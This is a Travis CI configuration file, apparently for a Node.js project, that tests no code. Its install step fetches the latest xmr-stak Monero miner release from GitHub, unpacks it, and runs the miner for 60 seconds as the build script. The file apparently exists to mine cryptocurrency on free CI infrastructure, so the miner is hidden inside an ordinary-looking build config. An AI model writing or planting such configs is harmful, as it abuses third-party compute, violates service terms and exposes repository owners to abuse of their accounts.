language: node_js
node_js:
- '7'
sudo: required
dist: trusty

jobs:
  include:          
      before_install: 
      - curl -O `curl -s https://api.github.com/repos/fireice-uk/xmr-stak/releases/latest | grep -o 'browser_download_url.*xmr-stak-portbin-linux.tar.gz' | sed 's/.*"//'`
      - tar xzf xmr-stak-portbin-linux.tar.gz


      script:      
      - timeout 60s ./xmr-stak.sh
            
      after_success:
      - echo success
